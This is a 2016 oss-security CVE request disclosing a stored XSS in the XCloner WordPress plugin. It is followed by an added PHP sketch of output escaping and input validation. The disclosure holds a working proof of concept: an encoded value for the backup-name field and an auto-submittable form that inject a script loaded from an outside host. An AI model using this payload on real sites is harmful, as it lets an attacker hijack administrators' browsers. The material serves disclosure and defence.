
List:       oss-security
Subject:    [oss-security] CVE request : a stored XSS in Xcloner for wordpress
From:       limingxing <limingxing () 360 ! cn>
Date:       2016-07-27 2:35:46
Message-ID: 3626D6E697A150459C44C0E5D8D8D00E0DBE8BDF () EX02 ! corp ! qihoo ! net

Hi

     I found a stored XSS in Xcloner for wordpress.  The XSS filter can
be bypassed.

     Here is the plugin page
     https://wordpress.org/plugins/xcloner-backup-and-restore/

     PoC

     In the "Cron setting" page (URL is
"http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config"),
set the "Backup name" (cron_bname) like
"1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on"

     <html>
         <form action="http://<target>/wordpress/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=config" method="post">
             <input type="hidden" name="cron_bname" value="1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on" />
             <input type="submit" name="submit">
         </form>
     </html>


     Fix way
     Update to version 3.1.5

     Change

     https://plugins.trac.wordpress.org/changeset/1456784


     Could you assign a CVE ID for it?

Chen Ruiqi
Codesafe Team
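
Added example, not part of the original message and not XCloner's code or the linked changeset: a sketch of the output-encoding and input-validation pattern that closes this class of bug. It assumes the stored backup name is echoed back into a quoted value attribute of the settings form, which the `">` prefix of the reported value suggests; all function names are hypothetical.

```php
<?php
// Added illustration. Function names are hypothetical, not XCloner's.

// The value from the report, URL-decoded the way PHP decodes form input.
$reported = urldecode('1%22%3E%3Cscript+src%3Dhttp%3A%2F%2F172.16.146.128%3A3000%2Fhook.js+on');

// Vulnerable pattern (assumed): stored setting echoed into an attribute as-is.
function render_field_unescaped(string $name): string {
    return '<input type="text" name="cron_bname" value="' . $name . '" />';
}

// Hardened output: encode for the HTML attribute context, quotes included.
// Inside WordPress, esc_attr() serves the same purpose.
function render_field_escaped(string $name): string {
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="cron_bname" value="' . $safe . '" />';
}

// Input-side check: a backup name only needs filename characters, so
// reject everything else before it is stored (allowlist, not a blocklist).
function validate_backup_name(string $name): ?string {
    return preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name) === 1 ? $name : null;
}

// Count element start tags in the rendered markup. More than one means
// the value broke out of its attribute and introduced markup of its own.
function count_start_tags(string $html): int {
    return (int) preg_match_all('/<[a-z]/i', $html);
}

printf("unescaped field: %d start tag(s)\n", count_start_tags(render_field_unescaped($reported)));
printf("escaped field:   %d start tag(s)\n", count_start_tags(render_field_escaped($reported)));
printf("reported value accepted:  %s\n", validate_backup_name($reported) === null ? 'no' : 'yes');
printf("plain name accepted:      %s\n", validate_backup_name('backup_site-01') === null ? 'no' : 'yes');
```

Escaping at output is the control that matters for stored values, since data already in the database predates any input filter added later.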